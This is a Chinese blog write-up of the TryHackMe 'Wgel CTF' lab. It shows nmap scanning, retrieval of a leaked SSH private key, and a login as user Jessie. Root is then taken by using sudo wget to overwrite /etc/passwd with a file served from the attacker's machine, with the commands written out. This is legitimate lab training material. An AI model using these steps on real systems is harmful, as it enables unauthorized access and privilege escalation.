tryhackme--Wgel CTF

最新推荐文章于 2023-10-21 22:23:13 发布
最新推荐文章于 2023-10-21 22:23:13 发布
阅读量383 收藏
点赞数
分类专栏: tryhackme 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/109251048
版权

tryhackme--Wgel CTF

这个靶机涉及的知识点有ssh的公钥算法知识和sudo提权常用手法。

nmap

简单扫描靶机的服务

nmap -T4 -sS -sV 10.10.247.24

在这里插入图片描述深度扫描也没没有什么可以直接利用的漏洞

nmap -T4 -sS -sV 10.10.247.24  --script vuln

在这里插入图片描述

目标机器为linux主机,并且目标主机开放了两个端口:22、80。

端口服务
22ssh
80http

id_rsa信息泄漏

访问80端口,发现为apache的默认页面,查看页面源代码,发现一句很有趣的话,其中 Jessie 可能为用户名

在这里插入图片描述

用dirsearch扫描站点,发现一个目录,访问进入真正的网站
在这里插入图片描述
在这里插入图片描述

但是目前除了一个可能的用户名我们没有其他的信息,试着再对其进行深度扫描,发现一个RSA文件,这个文件是ssh登录用户的私钥,有了用户名和私钥我们便可以登录目标主机。

在这里插入图片描述
将它下载下来并赋予权限600

wget http://10.10.247.24/sitemap/.ssh/id_rsa
chmod 600 id_rsa

在这里插入图片描述

接下来用私钥登录目标主机

ssh Jessie@10.10.247.24 -i id_rsa

在这里插入图片描述

在jessie的家目录经过一番查找发现user flag

在这里插入图片描述

wget的sudo提权

查看当前用户是否可以执行sudo命令,要是不了解sudo命令及其提权原理的可以自行百度。可以看到当前用户可以不用密码以root的身份执行wget命令,wget命令有一个-O选项可以重命名下载的文件,因此我们就可以以root的身份之执行该命令,重命名我们编写好的恶意的/etc/passwd文件,达到覆盖目标主机的密码文件的效果。在这里插入图片描述

具体过程如下,我们在攻击机上编写一个全新的/etc/passwd文件,将root的密码替换为我们自己的密码,实在不会弄hash就直接用自己kali上的shaow文件中的hsah值。

在这里插入图片描述

在攻击机上开启简易的http服务,靶机上下载修改过的密码文件,可以看到目标主机的密码文件已经被替换。

python -m SimpleHTTPServer //攻击机上执行
sudo  -u root /usr/bin/wget http://10.9.xxx.xx:8000/11 -O /etc/passwd  //靶机上执行

在这里插入图片描述切换root用户,输入我们替换的hash的对应的密码,成功登录,读取最后的flag。

在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tryhackme-ctf:TryHackMe CTF的编写,注释,dratfs,拼字游戏,文件和解决方案
05-06
注释,代码,PoC,解决方案,文章,涂鸦,草稿...。 (意大利前10名 :Italy: ) 使用的工具: 挖 ping 跟踪路线 exiftool 哈希猫 开膛手约翰 GTFObins 尼克托 哈希标识符 ... 敲门(端口敲门)
TryHackMe新手村
weixin_55154296的博客
04-17 7043
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6403
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
Welcome to TryHackMe --- 我在TryHackMe学习的第90天
M1n9K1n9的博客
02-27 9185
TryHackMe以下内容均为个人感言,没有收thm一分钱2022年11月30号,我通过搜索引擎发现了TryHackMe这个平台,正如它所说的那样,这一切就像打游戏,你在游戏当中学习到知识,这是非常的快乐的注:(每个room都有对应的不同的靶机)你还在担心怎么学的时候,TryHackMe已经为你准备好了几个路径,只需要无脑跟着路径学就可以了每条路径都包含了相应的教学room,你将会在这些room中一边学一边实践tryhackme还有许多模块,每个模块当中包含着与其相关的许多个room。
TRY HACK ME | Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3530
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
TryHackMe-渗透测试7_log
M1n9K1n9的博客
12-21 392
whois、https://dnsdumpster.com/、nslookup的使用,侦察网站的公开信息。
TryHackMe-notes:该存储库包含我对TryHackMe房间的注释和文章(演练和ctf类型)
03-27
TryHackMe撰写该存储库包含我对TryHackMe房间的注释和文章。 什么是TryHackMe? 是一个在线课程,可通过动手练习和实验来学习网络安全
tryhackme-writeups:我对TryHackMe机器的笔记
03-08
TryHackMe-写信列出写作
My-CTF-Challenges
05-16
我的CTF挑战 周大福 名称 语 概括 等级 TCTF2018_决赛 给我看一下贝壳 Java Spring自动绑定/反序列化 中等的
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
Tryhackme-Writeups:到目前为止,我的每个tryhackme房间的文字记录已完成
03-20
Tryhackme-Writeups 到目前为止,我的每个tryhackme房间的文字记录已完成 关于我:我自己Kartikey Jain,我是一名初学者Ethical Hacker,只是好奇事情如何破裂,我认为这现在成为我的激情,很高兴学习新概念。
tryhackme
03-08
tryhackme
如何注册TryHackMe
weixin_55638029的博客
10-21 809
2023年10月,我了解到OSCP,萌生了拿下OSCP的想法。后来刷B站,在一条介绍TryHackMe的视频下面,有一条评论提到了注册的方法:可以安装Header Editor插件,重定向url。点击规则列表,导入成功,就可以重新注册TryHackMe了,这时就会出现Google的人机验证。查询网页,有的说要特殊上网手段,要搞网络代理什么什么的,愣是没搞明白。,点击Join for FREE,输入注册信息,点击提交之后,就开始报错。点击进去,导入下载规则——下面的代码(存到本地,命名后缀为.json)。
TryHackMe-Wreath [网络杀伤链](windows网络)渗透测试
M1n9K1n9的博客
02-19 1853
了解如何通过破坏面向公众的 Web 计算机并通过隧道传输流量以访问 Wreath 网络中的其他计算机来透视网络。
如何注册tryhackme
weixin_35756892的博客
12-24 709
要注册TryHackMe,您需要执行以下步骤: 打开TryHackMe的网站(https://tryhackme.com) 点击网站的右上角的“注册”按钮 在弹出的注册表单中输入您的电子邮件地址和密码 点击“创建帐户”按钮 在您的电子邮件中收到确认邮件后,点击邮件中的链接以激活您的帐户 在完成这些步骤后,您就可以开始使用TryHackMe平台了。 ...
TryHackMe-渗透测试5_log
M1n9K1n9的博客
12-21 338
tryhackme讲到的主要的点就是尝试闭合标签或者其他符号绕过,fetch()用于发起http请求btoa()用于将数据进行base64 encode。
TryHackMe-基本渗透测试
M1n9K1n9的博客
12-22 865
这里的主要目标是尽可能多地学习。确保您使用OpenVPN配置文件连接到我们的网络。部署机器并连接到我们的网络查找计算机公开的服务按照上面这句话,我们先使用nmap简单扫一圈┌──(root💀kali)-[]└─#nmap-sS访问80端口的web,好像没东西,到8080端口看一下,有网页。
TryHackMe-渗透测试4_log
M1n9K1n9的博客
12-21 288
tryhackme讲的也比较清晰,摘抄点 点可以通过多种不同的方式在 Web 应用程序中发现潜在的 SSRF 漏洞。
TRY HACK ME| BLUE 永恒之蓝
AKAHRZ的博客
03-26 2516
永恒之蓝(EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织影子掮客泄漏。该工具利用445/TCP端口的文件分享协议的漏洞进行散播。
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值